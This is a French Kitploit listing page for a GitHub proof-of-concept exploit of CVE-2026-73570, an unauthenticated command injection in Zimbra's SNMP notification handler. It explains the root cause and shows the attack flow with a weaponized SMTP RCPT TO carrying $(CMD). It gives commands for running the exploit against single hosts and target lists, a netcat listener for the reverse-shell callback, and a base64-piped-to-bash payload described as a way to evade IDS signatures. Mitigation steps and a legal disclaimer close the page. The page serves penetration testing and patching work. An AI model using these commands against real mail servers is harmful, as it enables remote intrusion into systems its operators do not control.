Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-73570 — Zimbra SNMP Notification OS Command Injection — RCE non authentifié via l'exploit SMTP (Poc) | Kitploit
Outils/GitHubGitHub/gabrielunknown/cve-2026-73570
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHubgabrielunknown/cve-2026-73570

CVE-2026-73570

Zimbra SNMP Notification OS Command Injection — RCE non authentifié via l'exploit SMTP (Poc)

Voir le dépôt
1il y a 1 jourPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-73570 — Exploit RCE par notification SNMP Zimbra ZCS (PoC)

Exécution de code à distance non authentifiée via injection de commandes OS dans le gestionnaire de notifications SNMP de Zimbra Collaboration Suite.


Vue d'ensemble

ChampValeur
CVECVE-2026-73570
CVSS 3.18.9 ÉLEVÉE — AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L
CWECWE-78 — Neutralisation incorrecte d'éléments spéciaux utilisés dans une commande OS
AffectéZimbra ZCS < 10.1.20 (avec zimbra-snmp installé)
Corrigé dansZCS 10.1.20 — juillet 2026
CISA KEVAjouté le 2026-08-21 (échéance de remédiation FCEB : 2026-08-24)
Authentification requiseAucune
Exécution en tant queUtilisateur OS zimbra

Cause racine

Le paquet optionnel zimbra-snmp inclut une règle swatchdog qui surveille /var/log/zimbra.log pour les lignes correspondant à :

root@kitploit:~
Service status change: <NAME> changed from <STATE> to <STATE>

Lorsqu'une correspondance est trouvée, swatchdog transmet le champ <NAME> capturé directement au script shell de notification SNMP sans aucune assainissement.

Un attaquant non authentifié peut injecter une entrée de journal forgée en envoyant une commande SMTP RCPT TO spécialement formée. En utilisant une partie locale entre guillemets RFC 5321, des métacaractères shell — par ex. $(...) — sont intégrés dans <NAME> et s'exécutent lorsque swatchdog traite la ligne de journal résultante.


Pré-conditions

Les trois conditions suivantes doivent être vraies sur la cible pour que la vulnérabilité soit exploitable :

  • Le paquet zimbra-snmp est installé
  • Les notifications SNMP sont activées (snmp_notify = true)
  • Le service swatchdog est en cours d'exécution

Flux d'attaque

root@kitploit:~
Attaquant                          MTA Zimbra
   │                                  │
   │── TCP connect :25/:465/:587 ────►│
   │── EHLO mx-test.invalid ─────────►│
   │── MAIL FROM:<scanner@...> ──────►│
   │── RCPT TO:<"x: Service status    │
   │     change: localhost $(CMD)     │
   │     changed from stopped to      │
   │     running"@cve.invalid> ──────►│
   │                                  │── journalise les données RCPT TO ──► /var/log/zimbra.log
   │                                  │                               │
   │                                  │                         swatchdog correspond au
   │                                  │                         motif, extrait
   │                                  │                         $(CMD), exécute
   │◄─────────── rappel shell ───────────────────────────────────────┘
  1. Connectez-vous au port 25 / 465 / 587.
  2. Envoyez une conversation SMTP standard avec le RCPT TO armé.
  3. Zimbra journalise les données d'adresse indépendamment de l'acceptation/du rejet.
  4. swatchdog correspond au motif du journal et extrait le $(CMD) injecté.
  5. Le gestionnaire SNMP exécute CMD en tant qu'utilisateur OS zimbra.

Exploit

Prérequis

root@kitploit:~
cpan IO::Socket::SSL MIME::Base64 Digest::HMAC_MD5

Cible unique

root@kitploit:~
perl zimbra-poc.pl -H mail.target.com -r <VOTRE_IP> -R 4444

Liste de cibles

root@kitploit:~
perl zimbra-poc.pl -f targets.txt -r <VOTRE_IP> -R 4444

targets.txt — un hôte par ligne, :port optionnel, les lignes commençant par # sont ignorées :

root@kitploit:~
mail.example.com
mail.example.com:25
10.0.0.50:587
# commentaire ignoré

Toutes les options

OptionLongueDéfautDescription
-H--host—Nom d'hôte ou IP de la cible unique
-f--file—Fichier contenant la liste de cibles
-p--port587Port SMTP par défaut
-r--rhost—Votre IP pour le rappel du shell inverse
-R--rport4444Port de l'écouteur
-t--timeout15Délai d'expiration de la socket en secondes
-S--ssldésactivéTLS direct (auto-activé sur le port 465)
-v--verbosedésactivéAfficher le dialogue SMTP complet
-L--logfile—Écrire le journal de session dans un fichier
-h--help—Afficher l'aide

Exemple complet

root@kitploit:~
# Terminal 1 — démarrer l'écouteur
nc -lvnp 4444

# Terminal 2 — exécuter l'exploit
perl zimbra-poc.pl -H mail.target.com -r 10.10.10.1 -R 4444 -v

Technique de charge utile

La commande du shell inverse est encodée en base64 avant l'injection :

root@kitploit:~
echo <b64>|base64 -d|bash

Cela empêche les IDS/IPS de détecter les signatures en texte clair telles que /dev/tcp, bash -i ou nc -e. Le bloc encodé est injecté comme $(...) dans la partie locale entre guillemets de RCPT TO, déclenchant l'exécution côté serveur lorsque swatchdog traite l'entrée du journal.


Atténuation

ActionDétail
CorrectifMettre à niveau vers Zimbra ZCS ≥ 10.1.20
Désactiver la notification SNMPzmprov mcf zimbraSnmpNotifyEnabled FALSE && zmconfigdctl restart
Supprimer le paquetapt remove zimbra-snmp / yum remove zimbra-snmp
Contrôles réseauRestreindre le SMTP entrant (25/465/587) aux relais de confiance lorsque cela est opérationnellement possible

Références

  • NVD — CVE-2026-73570
  • Avis de sécurité Zimbra
  • Vulnérabilités connues exploitées CISA — CVE-2026-73570
  • Avis CERT.pl
  • BiuTrap/CVE-2026-73570

Avertissement

Cette preuve de concept est publiée à des fins de tests de sécurité autorisés, de recherche académique et de défense uniquement.
L'exécuter contre des systèmes que vous ne possédez pas ou pour lesquels vous ne disposez pas d'une autorisation écrite explicite de test est illégal.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.


Télécharger l’outil